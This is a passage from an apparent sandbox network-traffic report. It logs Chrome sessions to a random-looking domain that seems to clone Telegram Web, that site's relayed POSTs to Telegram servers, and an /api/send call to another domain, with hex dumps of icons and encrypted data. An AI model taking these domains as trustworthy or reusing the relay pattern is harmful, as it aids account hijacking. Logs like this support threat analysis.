                                  2025-01-12 00:03:49 UTC473INData Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 31 03 00 00 36 00 00 00 30 30 00 00 01 00 20 00 64 04 00 00 67 03 00 00 10 10 00 00 01 00 20 00 9e 01 00 00 cb 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 f8 49 44 41 54 78 01 bd 94 27 78 e3 40 10 85 17 1a 1a 06 9a 9d d2 95 2e 18 78 30 d0 30 30 f0 60 60 a0 61 a0 d2 95 de 9a a0 a1 a1 a0 d2 5b d3 f5 bd be 70 d9 dc 9b f4 e8 f3 ca dd ef fb 7e 5b 65 67 de cc ee d8 a2 5c 39 79 95 76 fc df 59 67 ef b7 eb ec fd 0a 80 04 fa 11 f9 f8 0c ef b0 c6 97 69 51 2f 21 99 05 3c a0 87 76 7f 52 39 38 3b 3f f5 63 8c 55 bd f1 46 94 72 36 e4 a4 b3 23 35 a0 a1 9d 1f 15 c3 b1 28 22 37 ec 45 a9 8a bb 46 70 38 08 e3 7a 80 7c 81 ed cb 96 b2 cc b1 d0 86 b9 1c dc fe 4e f5
                                  Data Ascii: 1600 dg PNGIHDR szzIDATx'x@.x000``a[p~[eg\9yvYgiQ/!<vR98;?cUFr6#5("7EFp8z|N
                                  2025-01-12 00:03:49 UTC1369INData Raw: 6e f6 46 01 b7 1a d0 6b 30 54 e8 48 12 27 30 49 e2 1d 1f 85 ed c5 cc 63 c5 21 5f 12 5a 74 e3 03 d0 2b 12 8d 59 3c 78 5c 24 9b 8f b3 b9 69 5d a8 38 9f 99 65 14 60 af 5c cb ee e5 1b 7a cd fd b6 17 99 6e fe 6d 67 f3 6c 0c 00 ef 52 92 50 1c e7 33 c2 de a2 63 e9 3a e8 5a ba a6 62 b0 c9 c8 e3 f9 8e be 32 66 72 18 ba 52 ca 22 16 79 cc 78 d7 81 c0 85 db b5 74 45 95 c0 89 cb 11 a6 3c 31 4f c7 ca b5 2b 6c ef 3c db b9 78 49 95 80 18 e2 01 4b 52 a4 74 39 79 b2 c2 da 38 4f e3 42 f1 83 4a e1 a3 31 cd 2b 0a 2c 65 ae d8 5b b0 70 e3 75 78 17 54 0d c3 d8 66 bf c8 6e e0 4f 2b 31 0e 9e ae 78 92 e5 9d 5b 1d de b9 ee 58 38 a7 6a 19 c3 90 4a a5 5f 0f a0 79 3d bc 50 40 46 40 af 8b c8 b5 2f 9c 51 2d 20 29 ff f4 f8 68 12 d7 b1 97 88 2b e3 45 29 bc 08 da e6 4f a9 91 b0 47 66 f2 3c
                                  Data Ascii: nFk0TH'0Ic!_Zt+Y<x\$i]8e`\znmglRP3c:Zb2frR"yxtE<1O+l<xIKRt9y8OBJ1+,e[puxTfnO+1x[X8jJ_y=P@F@/Q- )h+E)OGf<
                                  2025-01-12 00:03:49 UTC567INData Raw: af f2 71 76 32 2c 98 03 ab bc a0 75 9c 84 1e df fb 8a 06 09 c4 b4 18 1b eb 24 c6 c6 8e a4 1c df fb 92 06 81 b1 2d 29 b1 99 88 5e 0b 3b 6e a1 32 0c ea 60 f7 cb 9e 02 e3 ca 31 da f8 a7 48 f4 47 90 44 ea 71 90 60 6c 4f 6a 06 07 fe a2 7b c0 d7 11 fb c4 09 3b 28 c1 65 8a 83 b6 18 49 69 e2 5b 32 61 34 e1 4b 0c 53 46 b6 a4 c7 55 6c 98 ce c4 fc 9c 8e ee 7c ae 19 b9 81 c6 67 e6 bb 00 ba b0 e9 45 ec 7f 00 d9 0a 0b 64 b1 00 47 34 00 00 00 00 49 45 4e 44 ae 42 60 82 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 01 65 49 44 41 54 78 01 95 92 25 74 ac 31 10 85 23 d7 7b f1 64 1e e7 61 eb 55 e5 7a 2f 56 56 56 56 56 46 96 99 59 ae fc 65 65 ca 29 a7 9c 72 64 dd f4 ce 62 96 68 ce f9 82 77 6e 50 54 47 f7 a6 57 dd ab
                                  Data Ascii: qv2,u$-)^;n2`1HGDq`lOj{;(eIi[2a4KSFUl|gEdG4IENDB`PNGIHDRaeIDATx%t1#{daUz/VVVVVFYee)rdbhwnPTGW


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  46192.168.2.649866172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:49 UTC595OUTGET /icon-192x192.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:50 UTC905INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:50 GMT
                                  Content-Type: image/png
                                  Content-Length: 3059
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-bf3"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUoAzaYUlex%2Bkq53h3m2RKz%2Fedf0yIR%2BDuVKu2LJU97FWNeaNt00T6iNYDmq%2FQHKH5NfUqa5b%2FNY5xLuKHBwDyU02d1RL6XD8T%2FHiY37n%2FdK0OzBUWaVey3HEMv6vIGpMylGyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2bba8e30ca0-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1457&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1173&delivery_rate=1901041&cwnd=239&unsent_bytes=0&cid=2c374e24652c8f08&ts=601&x=0"
                                  2025-01-12 00:03:50 UTC464INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 00 30 50 4c 54 45 00 00 00 2f a5 de 2f a5 de 2f a5 de 31 a6 e1 34 aa e2 29 9d d5 2c a0 d9 2e a3 dd 31 a6 e1 34 a9 e5 36 ac e9 ff ff ff d6 ed f8 9d d4 ef 60 b9 e6 2c 6e 8b f1 00 00 00 06 74 52 4e 53 00 e4 bb 81 48 1b 2b b3 d2 43 00 00 0b 6c 49 44 41 54 78 01 d4 93 37 02 04 31 0c 02 57 20 55 fc ff bf 17 2a 57 9b 92 d1 54 2e 05 8c 97 07 a8 24 09 44 84 fe 7c 1f 00 c9 ac c5 9d 4c 02 5a 01 f0 8d 91 84 76 02 66 df e3 0d 43 24 74 12 a4 43 f7 ba c4 dc 1d 8a a1 cb 04 67 fd 6a 42 37 11 33 66 18 cb bf 63 06 23 77 fc 4d 2a ea 11 58 06 e7 fb 47 c8 35 79 fc bf 73 41 0f 83 47 47 a0 5e 80 06 f6 58 7a 34 da d3 d1 a3 b1 fe 8e 23 50 2f 43 03 7d 6c 34 1a f4 e9 a8 d1 a0 4f
                                  Data Ascii: PNGIHDRe50PLTE///14),.146`,ntRNSH+ClIDATx71W U*WT.$D|LZvfC$tCgjB73fc#wM*XG5ysAGG^Xz4#P/C}l4O
                                  2025-01-12 00:03:50 UTC1369INData Raw: 9d 3e 48 93 bb f3 96 e1 6f e6 58 e6 18 7e 03 fe 3e 2a 42 23 fe 94 7a ef 7f 56 08 09 e8 6e af 7d f4 89 f3 8c 9f e6 d7 5f f0 cf af 60 f6 0a 54 31 6e b3 b6 f5 bb 9f ef ca cf f3 49 fd 28 81 1e 05 67 3f d3 32 6e 3c ff d4 0a 16 8f 71 78 ce 1d 18 cc cf cb d9 3f 00 74 18 e7 3e 6a c3 98 d7 f0 d7 93 17 10 81 b9 b5 4d 21 c4 78 7e b3 91 e7 ea fc 83 6d 65 97 88 c2 6b 3c bf d9 c8 0b 6e 12 6c 2d d2 62 5e c4 10 e3 f9 ed 36 58 75 c2 a3 c7 1c 86 8c e7 c3 06 1d 06 40 15 3b 30 86 1f db 80 06 b8 1f da 6d b0 4a cd 3a 70 25 ff fd 21 9a fc e6 98 de dd 40 77 47 7c 13 a5 ec b7 47 4e a1 83 ef 8f 3c b7 3a f8 b6 58 e3 3f 01 b7 47 9e d2 29 07 9b f7 e3 22 fe 72 b0 01 f6 1d 6e b5 61 91 04 d3 a7 0f f0 2d d8 82 65 1f 96 70 c3 f4 e8 b4 67 ac 31 9b 5d cd 0f b6 20 19 97 8c 99 8c 89 cc 34 03
                                  Data Ascii: >HoX~>*B#zVn}_`T1nI(g?2n<qx?t>jM!x~mek<nl-b^6Xu@;0mJ:p%!@wG|GN<:X?G)"rna-epg1] 4
                                  2025-01-12 00:03:50 UTC1226INData Raw: f9 c9 c6 bf 96 3c 26 9b bb 31 eb 43 16 1a 81 f0 dd 4b 04 a7 ff fe 0c 3b f5 65 02 b3 e1 8b c0 45 d0 5b c0 ee af db b6 2a fa ed 47 17 c0 6f 8f d7 9f 0c 90 80 f4 63 08 4e a1 fd ed 61 66 43 91 26 96 21 dc 58 08 f7 f6 fb aa e1 29 77 68 56 fd 93 47 c5 0e a1 0d 10 82 7b f8 9b 80 73 21 0c 97 c9 3f 94 98 bb b2 66 12 2a 46 2e 7e 24 80 1e 52 da a9 8f 05 2d 81 91 1d 70 ac 92 89 2d 62 5f a5 21 a6 67 eb 0f 20 88 a0 0f 21 86 30 9a d9 24 06 cf b0 3b 03 13 e4 44 36 22 11 7e 2f fe 95 d5 8a fa 8a 8e a1 f8 64 66 33 19 ce 85 b8 c0 8b cc 05 75 d1 33 17 3f b0 49 41 3a d4 67 f8 88 65 36 33 c3 a9 07 87 3e 3e 49 47 03 70 fd b9 de 4c 20 74 e0 28 2a 67 36 8b 35 0c e8 17 82 e7 26 a1 79 7a c3 87 f8 fc fd 92 42 e5 5e 05 d1 c6 33 a1 75 83 35 8c 08 5c 17 f9 29 5b 06 fb 43 8e ec f5 6e 02
                                  Data Ascii: <&1CK;eE[*GocNafC&!X)whVG{s!?f*F.~$R-p-b_!g !0$;D6"~/df3u3?IA:ge63>>IGpL t(*g65&yzB^3u5\)[Cn


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  47192.168.2.649867149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:49 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 40
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:49 UTC40OUTData Raw: 00 00 00 00 00 00 00 00 5c 04 d7 a2 e4 06 83 67 14 00 00 00 f1 8e 7e be f3 81 d8 6c 57 89 9e 85 b2 99 4f 3c 7b 63 cb b7
                                  Data Ascii: \g~lWO<{c
                                  2025-01-12 00:03:50 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:50 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 100
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:50 UTC100INData Raw: 00 00 00 00 00 00 00 00 01 40 f8 05 e6 06 83 67 50 00 00 00 63 24 16 05 f3 81 d8 6c 57 89 9e 85 b2 99 4f 3c 7b 63 cb b7 df 4a 5d 82 ac a3 e2 40 08 5d 89 46 a5 06 7b 2a 08 16 e3 92 34 e4 ad bb d3 00 00 00 15 c4 b5 1c 03 00 00 00 85 fd 64 de 85 1d 9d d0 a5 b7 f7 09 35 5f c3 0b 21 6b e8 6c 02 2b b4 c3
                                  Data Ascii: @gPc$lWO<{cJ]@]F{*4d5_!kl+


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  48192.168.2.649876149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:50 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:51 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:50 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:51 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  49192.168.2.649877149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:50 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 340
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:50 UTC340OUTData Raw: 00 00 00 00 00 00 00 00 2c 60 23 ac e5 06 83 67 40 01 00 00 be e4 12 d7 f3 81 d8 6c 57 89 9e 85 b2 99 4f 3c 7b 63 cb b7 df 4a 5d 82 ac a3 e2 40 08 5d 89 46 a5 06 7b 2a 04 44 cd 94 49 00 00 00 04 55 2a 17 3b 00 00 00 85 fd 64 de 85 1d 9d d0 fe 00 01 00 24 fb 3d 37 58 f3 c9 c8 80 a9 5e 41 13 c6 7f 1e 41 7e 2a b1 e1 33 fd 37 f2 cf 2a ae 7f 0e 32 4a 45 2f f0 32 d6 aa 44 15 96 0a 10 cd 46 94 47 db ec 4c 6c 82 24 63 f6 70 48 1b 76 91 bb 9e 01 bf 8e 14 04 e2 2a 57 72 e4 0d 0c 40 28 7b 61 e5 bb 97 c7 17 b6 fe 7d 81 9f 60 d9 05 e7 37 e2 1d f3 20 a6 71 be 33 cf 78 b3 24 ca 08 0e 27 7a dc 37 d3 36 35 d6 58 ea 30 75 e9 df 9f f7 bf 97 13 78 18 ed 38 d4 0e 8c 0c 4a 5b 3d 67 59 19 fc a8 30 14 86 56 98 70 96 9f 50 b0 94 ee b4 5f 85 56 32 69 15 51 7f a5 9e 41 c0 e2 48 61
                                  Data Ascii: ,`#g@lWO<{cJ]@]F{*DIU*;d$=7X^AA~*37*2JE/2DFGLl$cpHv*Wr@({a}`7 q3x$'z765X0ux8J[=gY0VpP_V2iQAHa
                                  2025-01-12 00:03:51 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:51 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 652
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:51 UTC652INData Raw: 00 00 00 00 00 00 00 00 01 94 f7 10 e7 06 83 67 78 02 00 00 5c 07 e8 d0 f3 81 d8 6c 57 89 9e 85 b2 99 4f 3c 7b 63 cb b7 df 4a 5d 82 ac a3 e2 40 08 5d 89 46 a5 06 7b 2a fe 50 02 00 39 92 b0 d3 d0 ac 13 67 0c 5d 58 35 c7 6b 5c ef 93 a5 f5 be a7 02 ca f4 d6 7f 47 7b 08 bd 9d 82 db af 14 b8 51 5f 5c 4f ea 74 fe 69 a1 d3 89 ea 74 74 f3 d8 1a 09 97 96 19 01 30 33 32 85 65 b0 e5 b6 d4 77 64 64 77 ce 95 b7 16 59 e7 6f d0 6a 0e 90 bf b1 28 06 ea 6b 4c 44 06 37 19 4e a8 9d 89 ef 56 8a 23 0b 17 31 52 3a 2a 85 1f ae 54 0a bf b9 98 7f cf 9b 36 aa 6a cb ca 16 ff a3 0f 4b 28 ac d1 64 de 78 bc 31 16 fc 9a 2a 77 a8 48 4a df 02 92 dc 9d 8b 85 2f 65 aa 04 4a 74 c3 3d 4e fa d0 08 15 50 cd ee ef d9 62 33 7d 9b 14 e5 29 c8 bd f6 41 0e 5f 76 d4 ce 83 dd 0a de d8 92 4c 73 d9 5e
                                  Data Ascii: gx\lWO<{cJ]@]F{*P9g]X5k\G{Q_\Otitt032ewddwYoj(kLD7NV#1R:*T6jK(dx1*wHJ/eJt=NPb3})A_vLs^


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  50192.168.2.649878172.67.159.634432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:51 UTC351OUTGET /api/send HTTP/1.1
                                  Host: hu.bafanglaicai.app
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:51 UTC1059INHTTP/1.1 405 Method Not Allowed
                                  Date: Sun, 12 Jan 2025 00:03:51 GMT
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-DNS-Prefetch-Control: on
                                  Content-Security-Policy: default-src 'self';img-src * data:;script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';connect-src 'self' api.umami.is cloud.umami.is;frame-ancestors 'self' undefined
                                  Access-Control-Allow-Origin: *
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2BX7FWk81LDOT34xUgcuOMWwnzaX8wTb%2F9QNP1p7JHLKt%2FxM%2FpgRdKuoSYXULY%2F9dmMkC1lxEb4Sxgl6zdhykoqyv%2FcrIpgdXSZMWGDeRDodc%2B%2BWOYQBVdSyUgnwAZad1fjpuily"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2c53ad043a1-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2403&min_rtt=2399&rtt_var=909&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=929&delivery_rate=1198194&cwnd=233&unsent_bytes=0&cid=36f2deda86eded25&ts=636&x=0"
                                  2025-01-12 00:03:51 UTC28INData Raw: 31 36 0d 0a 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0d 0a
                                  Data Ascii: 16405 Method Not Allowed
                                  2025-01-12 00:03:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  51192.168.2.649888172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:51 UTC357OUTGET /icon-192x192.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:51 UTC902INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:51 GMT
                                  Content-Type: image/png
                                  Content-Length: 3059
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-bf3"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ks6oVNUGGneEjLZhYT2ZjiHZ49qfqqB2aGKR6IwGDRAB%2B6bsj%2BH8uuvUWRHDKh6wSzDgeqxpDVYJ%2BUae37jhC%2BnN0qrc%2BpEMXY8H00aA4kRVmfXjIR%2FPr3sI6UF6vp6Jr2HBdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2c8b99b0f5b-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1458&rtt_var=1149&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=935&delivery_rate=754716&cwnd=221&unsent_bytes=0&cid=71021da81243c81a&ts=146&x=0"
                                  2025-01-12 00:03:51 UTC467INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 00 30 50 4c 54 45 00 00 00 2f a5 de 2f a5 de 2f a5 de 31 a6 e1 34 aa e2 29 9d d5 2c a0 d9 2e a3 dd 31 a6 e1 34 a9 e5 36 ac e9 ff ff ff d6 ed f8 9d d4 ef 60 b9 e6 2c 6e 8b f1 00 00 00 06 74 52 4e 53 00 e4 bb 81 48 1b 2b b3 d2 43 00 00 0b 6c 49 44 41 54 78 01 d4 93 37 02 04 31 0c 02 57 20 55 fc ff bf 17 2a 57 9b 92 d1 54 2e 05 8c 97 07 a8 24 09 44 84 fe 7c 1f 00 c9 ac c5 9d 4c 02 5a 01 f0 8d 91 84 76 02 66 df e3 0d 43 24 74 12 a4 43 f7 ba c4 dc 1d 8a a1 cb 04 67 fd 6a 42 37 11 33 66 18 cb bf 63 06 23 77 fc 4d 2a ea 11 58 06 e7 fb 47 c8 35 79 fc bf 73 41 0f 83 47 47 a0 5e 80 06 f6 58 7a 34 da d3 d1 a3 b1 fe 8e 23 50 2f 43 03 7d 6c 34 1a f4 e9 a8 d1 a0 4f
                                  Data Ascii: PNGIHDRe50PLTE///14),.146`,ntRNSH+ClIDATx71W U*WT.$D|LZvfC$tCgjB73fc#wM*XG5ysAGG^Xz4#P/C}l4O
                                  2025-01-12 00:03:51 UTC1369INData Raw: 93 bb f3 96 e1 6f e6 58 e6 18 7e 03 fe 3e 2a 42 23 fe 94 7a ef 7f 56 08 09 e8 6e af 7d f4 89 f3 8c 9f e6 d7 5f f0 cf af 60 f6 0a 54 31 6e b3 b6 f5 bb 9f ef ca cf f3 49 fd 28 81 1e 05 67 3f d3 32 6e 3c ff d4 0a 16 8f 71 78 ce 1d 18 cc cf cb d9 3f 00 74 18 e7 3e 6a c3 98 d7 f0 d7 93 17 10 81 b9 b5 4d 21 c4 78 7e b3 91 e7 ea fc 83 6d 65 97 88 c2 6b 3c bf d9 c8 0b 6e 12 6c 2d d2 62 5e c4 10 e3 f9 ed 36 58 75 c2 a3 c7 1c 86 8c e7 c3 06 1d 06 40 15 3b 30 86 1f db 80 06 b8 1f da 6d b0 4a cd 3a 70 25 ff fd 21 9a fc e6 98 de dd 40 77 47 7c 13 a5 ec b7 47 4e a1 83 ef 8f 3c b7 3a f8 b6 58 e3 3f 01 b7 47 9e d2 29 07 9b f7 e3 22 fe 72 b0 01 f6 1d 6e b5 61 91 04 d3 a7 0f f0 2d d8 82 65 1f 96 70 c3 f4 e8 b4 67 ac 31 9b 5d cd 0f b6 20 19 97 8c 99 8c 89 cc 34 03 7f bb f9
                                  Data Ascii: oX~>*B#zVn}_`T1nI(g?2n<qx?t>jM!x~mek<nl-b^6Xu@;0mJ:p%!@wG|GN<:X?G)"rna-epg1] 4
                                  2025-01-12 00:03:51 UTC1223INData Raw: bf 96 3c 26 9b bb 31 eb 43 16 1a 81 f0 dd 4b 04 a7 ff fe 0c 3b f5 65 02 b3 e1 8b c0 45 d0 5b c0 ee af db b6 2a fa ed 47 17 c0 6f 8f d7 9f 0c 90 80 f4 63 08 4e a1 fd ed 61 66 43 91 26 96 21 dc 58 08 f7 f6 fb aa e1 29 77 68 56 fd 93 47 c5 0e a1 0d 10 82 7b f8 9b 80 73 21 0c 97 c9 3f 94 98 bb b2 66 12 2a 46 2e 7e 24 80 1e 52 da a9 8f 05 2d 81 91 1d 70 ac 92 89 2d 62 5f a5 21 a6 67 eb 0f 20 88 a0 0f 21 86 30 9a d9 24 06 cf b0 3b 03 13 e4 44 36 22 11 7e 2f fe 95 d5 8a fa 8a 8e a1 f8 64 66 33 19 ce 85 b8 c0 8b cc 05 75 d1 33 17 3f b0 49 41 3a d4 67 f8 88 65 36 33 c3 a9 07 87 3e 3e 49 47 03 70 fd b9 de 4c 20 74 e0 28 2a 67 36 8b 35 0c e8 17 82 e7 26 a1 79 7a c3 87 f8 fc fd 92 42 e5 5e 05 d1 c6 33 a1 75 83 35 8c 08 5c 17 f9 29 5b 06 fb 43 8e ec f5 6e 02 51 5f 22
                                  Data Ascii: <&1CK;eE[*GocNafC&!X)whVG{s!?f*F.~$R-p-b_!g !0$;D6"~/df3u3?IA:ge63>>IGpL t(*g65&yzB^3u5\)[CnQ_"


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  52192.168.2.649887172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:51 UTC452OUTGET /rlottie-wasm.f013598f1b2ba719f25e.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  Accept: */*
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.js
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:52 UTC920INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:52 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
